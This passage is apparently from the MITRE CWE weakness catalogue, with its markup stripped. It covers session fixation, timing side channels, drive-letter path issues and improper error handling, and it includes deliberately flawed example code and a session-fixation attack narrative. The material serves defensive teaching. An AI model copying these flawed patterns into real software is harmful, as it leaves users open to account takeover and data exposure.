Gain Privileges or Assume Identity + + + + + Architecture and Design + Invalidate any existing session identifiers prior to authorizing a new user session. + + + Architecture and Design + For platforms such as ASP that do not generate new values for sessionid cookies, utilize a secondary cookie. In this approach, set a secondary cookie on the user's browser to a random value and set a session variable to the same value. If the session variable and the cookie value ever don't match, invalidate the session, and force the user to log on again. + + + + + The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate(). + + private void auth(LoginContext lc, HttpSession session) throws LoginException {...lc.login();...} + + In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim's active session, providing nearly unrestricted access to the victim's account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal. + In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker. + In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim's browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]. + + + The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the <code>j_security_check</code>, which typically does not invalidate the existing session before processing the login request. + + <form method="POST" action="j_security_check"><input type="text" name="j_username"><input type="text" name="j_password"></form> + + + + + + Session Fixation + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + 37 + Session Fixation + + + + + + + + + + + + + + + + Allowed + This is a well-known Composite of multiple weaknesses that must all occur simultaneously, although it is attack-oriented in nature. + While attack-oriented composites are supported in CWE, they have not been a focus of research. There is a chance that future research or CWE scope clarifications will change or deprecate them. Perform root-cause analysis to determine which weaknesses allow session fixation to occur, and map to those weaknesses. For example, predictable session identifiers might enable session fixation attacks to succeed; if this occurs, they might be better characterized as randomness/predictability weaknesses. + + + + + + Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim's network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Description + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information. + + In some instances, knowing when data is transmitted between parties can provide a malicious user with privileged information. Also, externally monitoring the timing of operations can potentially reveal sensitive data. For example, a cryptographic operation can expose its internal state if the time it takes to perform the operation varies, based on the state. + Covert channels are frequently classified as either storage or timing channels. Some examples of covert timing channels are the system's paging rate, the time a certain transaction requires to execute, and the time it takes to gain access to a shared bus. + + + + + + + + + + Architecture and Design + + + Implementation + + + Medium + + + Confidentiality + Other + Read Application Data + Other + Information exposure. + + + + + Architecture and Design + Whenever possible, specify implementation strategies that do not introduce time variances in operations. + + + Implementation + Often one can artificially manipulate the time which operations take or -- when operations occur -- can remove information from the attacker. + + + Implementation + It is reasonable to add artificial or random delays so that the amount of CPU time consumed is independent of the action being taken by the application. + + + + + In this example, the attacker observes how long an authentication takes when the user types in the correct password. + When the attacker tries their own values, they can first try strings of various length. When they find a string of the right length, the computation will take a bit longer, because the for loop will run at least once. Additionally, with this code, the attacker can possibly learn one character of the password at a time, because when they guess the first character right, the computation will take longer than a wrong guesses. Such an attack can break even the most sophisticated password with a few hundred guesses. + + def validate_password(actual_pw, typed_pw): + if len(actual_pw) <> len(typed_pw):return 0 + for i in len(actual_pw):if actual_pw[i] <> typed_pw[i]:return 0 + + return 1 + + + + Note that, in this example, the actual password must be handled in constant time, as far as the attacker is concerned, even if the actual password is of an unusual length. This is one reason why it is good to use an algorithm that, among other things, stores a seeded cryptographic one-way hash of the password, then compare the hashes, which will always be of the same length. + + + + + Timing + + + Covert Timing Channel + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.9, members of the CWE Hardware SIG are working to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks that create or exploit covert channels. As a result of that work, this entry might change in CWE 4.10. + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Gain Privileges or Assume Identity + The attacker can gain access to otherwise unauthorized resources. + + + Integrity + Confidentiality + Other + Modify Application Data + Modify Files or Directories + Read Application Data + Read Files or Directories + Other + Race conditions such as this kind may be employed to gain read or write access to resources not normally readable or writable by the user in question. + + + Integrity + Other + Modify Application Data + Other + The resource in question, or other resources (through the corrupted one) may be changed in undesirable ways by a malicious user. + + + Non-Repudiation + Hide Activities + If a file or other resource is written in this method, as opposed to a valid way, logging of the activity may not occur. + + + Non-Repudiation + Integrity + Modify Files or Directories + In some cases it may be possible to delete files that a malicious user might not otherwise have access to -- such as log files. + + + + + Symbolic name not mapping to correct object + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts input that contains a drive letter or Windows volume letter ('C:dirname') that potentially redirects access to an unintended location or arbitrary file. + + + + + + + + + Implementation + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. + + + Integrity + Modify Files or Directories + The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. + + + Confidentiality + Read Files or Directories + The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. + + + Availability + DoS: Crash, Exit, or Restart + The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2001-0038 + Remote attackers can read arbitrary files by specifying the drive letter in the requested URL. + https://www.cve.org/CVERecord?id=CVE-2001-0038 + + + CVE-2001-0255 + FTP server allows remote attackers to list arbitrary directories by using the "ls" command and including the drive letter name (e.g. C:) in the requested pathname. + https://www.cve.org/CVERecord?id=CVE-2001-0255 + + + CVE-2001-0687 + FTP server allows a remote attacker to retrieve privileged system information by specifying arbitrary paths. + https://www.cve.org/CVERecord?id=CVE-2001-0687 + + + CVE-2001-0933 + FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument. + https://www.cve.org/CVERecord?id=CVE-2001-0933 + + + CVE-2002-0466 + Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages. + https://www.cve.org/CVERecord?id=CVE-2002-0466 + + + CVE-2002-1483 + Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form "C:" (Drive letter), "//absolute/path", or ".." . + https://www.cve.org/CVERecord?id=CVE-2002-1483 + + + CVE-2004-2488 + FTP server read/access arbitrary files using "C:\" filenames + https://www.cve.org/CVERecord?id=CVE-2004-2488 + + + + + 'C:dirname' or C: (Windows volume or 'drive letter') + + + FIO05-C + Identify files using multiple file attributes + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Drive Letter or Windows Volume - 'C:dirname' + + + + The product detects a specific error, but takes no actions to handle the error. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Integrity + Other + Varies by Context + Unexpected State + Alter Execution Logic + An attacker could utilize an ignored error condition to place the system in an unexpected state that could lead to the execution of unintended logic and could cause other unintended behavior. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Properly handle each exception. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment. + + + Implementation + If a function returns an error, it is important to either fix the problem and try again, alert the user that an error has happened and let the program continue, or alert the user and close and cleanup the program. + + + Testing + Subject the product to extensive testing to discover some of the possible instances of where/how errors or return values are not handled. Consider testing techniques such as ad hoc, equivalence partitioning, robustness and fault tolerance, mutation, and fuzzing. + + + + + The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed. + + foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {//We do nothing so we just ignore the error.} + + The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate. + Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code. + + foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {printf("Malloc failed to allocate memory resources");return -1;} + + + + In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed. + + char* readfile (char *filename) { + try { + // open input fileifstream infile;infile.open(filename); + if (!infile.is_open()) {throw "Unable to open file " + filename;} + // get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg); + // allocate memorychar *buffer = new char [length]; + // read data from fileinfile.read (buffer,length); + if (!infile.good()) {throw "Unable to read from file " + filename;} + infile.close(); + return buffer; + }catch (...) {/* bug: insert code to handle this later */} + } + + The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program. + + char* readFile (char *filename) { + try { + // open input fileifstream infile;infile.open(filename); + if (!infile.is_open()) {throw "Unable to open file " + filename;} + // get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg); + // allocate memorychar *buffer = new char [length]; + // read data from fileinfile.read (buffer,length); + if (!infile.good()) {throw "Unable to read from file " + filename;}infile.close(); + return buffer; + }catch (char *str) {printf("Error: %s \n", str);infile.close();throw str;}catch (...) {printf("Error occurred trying to read from file \n");infile.close();throw;} + } + + + + In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String. + + public String readFile(String filename) { + String retString = null;try { + // initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file); + // initialize character bufferlong fLen = file.length();char[] cBuf = new char[(int) fLen]; + // read data from fileint iRead = fr.read(cBuf, 0, (int) fLen); + // close filefr.close(); + retString = new String(cBuf); + + } catch (Exception ex) {/* do nothing, but catch so it'll compile... */}return retString; + } + + The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised. + + public String readFile(String filename) throws FileNotFoundException, IOException, Exception { + String retString = null;try { + // initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file); + // initialize character bufferlong fLen = file.length();char [] cBuf = new char[(int) fLen]; + // read data from fileint iRead = fr.read(cBuf, 0, (int) fLen); + // close filefr.close(); + retString = new String(cBuf); + + } catch (FileNotFoundException ex) {System.err.println ("Error: FileNotFoundException opening the input file: " + filename );System.err.println ("" + ex.getMessage() );throw new FileNotFoundException(ex.getMessage());} catch (IOException ex) {System.err.println("Error: IOException reading the input file.\n" + ex.getMessage() );throw new IOException(ex);} catch (Exception ex) {System.err.println("Error: Exception reading the input file.\n" + ex.getMessage() );throw new Exception(ex);}return retString; + } + + + + + + Improper error handling + + + ERR00-J + Do not suppress or ignore checked exceptions + + + SFP4 + Unchecked Status Condition + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Error Handling + + + + [PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed. + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Integrity + Other + Varies by Context + Unexpected State + Alter Execution Logic + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + The choice between a language which has named or unnamed exceptions needs to be done. While unnamed exceptions exacerbate the chance of not properly dealing with an exception, named exceptions suffer from the up call version of the weak base class problem. + + + Requirements + A language can be used which requires, at compile time, to catch all serious exceptions. However, one must make sure to use the most current version of the API as new exceptions could be added. + + + Implementation + Catch all relevant exceptions. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment. + + + + + The following code excerpt ignores a rarely-thrown exception from doExchange(). + + try {doExchange();}catch (RareException e) { + + + // this can never happen + + + } + + If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program's behavior. + + + + + Unchecked Return Value + + + Empty Catch Block + + + Uncaught exception + + + A7 + Improper Error Handling + CWE More Specific + + + ERR00-C + Adopt and implement a consistent and comprehensive error-handling policy + + + ERR33-C + Detect and handle standard library errors + CWE More Abstract + + + ERR34-C + Detect errors when converting a string to a number + CWE More Abstract + + + FLP32-C + Prevent or detect domain and range errors in math functions + Imprecise + + + POS54-C + Detect and handle POSIX library errors + CWE More Abstract + + + EXP31-PL + Do not suppress or ignore exceptions + Imprecise + + + SFP4 + Unchecked Status Condition + + + + + + + Prohibited + This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts. It combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue. + Consider CWE-252: Unchecked Return Value; CWE-1069: Empty Exception Block; CWE-248: Uncaught Exception; or other entries under CWE-754: Improper Check for Unusual or Exceptional Conditions or CWE-755: Improper Handling of Exceptional Conditions. + + + + + + This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts. It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue. CWE analysts might map to this entry based on any of these issues. 7PK has "Empty Catch Block" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle. In PLOVER there is "Unchecked Return Value" which is CWE-252, but unlike "Empty Catch Block" there isn't even a check of the issue - and "Unchecked Error Condition" implies lack of a check. For CLASP, "Uncaught Exception" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least. There are other issues related to error handling and checks. + + When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions: + + This method call can never fail. + It doesn't matter if this call fails. + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product encounters an error but does not provide a status code or return value to indicate that an error has occurred. + + + + + + + + + Primary + + + Resultant + + + + + + + + Implementation + + + + + Integrity + Other + Varies by Context + Unexpected State + Errors that are not properly reported could place the system in an unexpected state that could lead to unintended behaviors. + + + + + In the following snippet from a doPost() servlet method, the server returns "200 OK" (default) even if an error occurs. + + try { + + + // Something that may throw an exception. + ... + } catch (Throwable t) {logger.error("Caught: " + t.toString());return;} + + + + + + CVE-2004-0063 + Function returns "OK" even if another function returns a different status code than expected, leading to accepting an invalid PIN number. + https://www.cve.org/CVERecord?id=CVE-2004-0063 + + + CVE-2002-1446 + Error checking routine in PKCS#11 library returns "OK" status even when invalid signature is detected, allowing spoofed messages. + https://www.cve.org/CVERecord?id=CVE-2002-1446 + + + CVE-2002-0499 + Kernel function truncates long pathnames without generating an error, leading to operation on wrong directory. + https://www.cve.org/CVERecord?id=CVE-2002-0499 + + + CVE-2005-2459 + Function returns non-error value when a particular erroneous condition is encountered, leading to resultant NULL dereference. + https://www.cve.org/CVERecord?id=CVE-2005-2459 + + + + + Missing Error Status Code + + + TPS03-J + Ensure that tasks executing in a thread pool do not fail silently + + + SFP6 + Incorrect Exception Behavior + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships 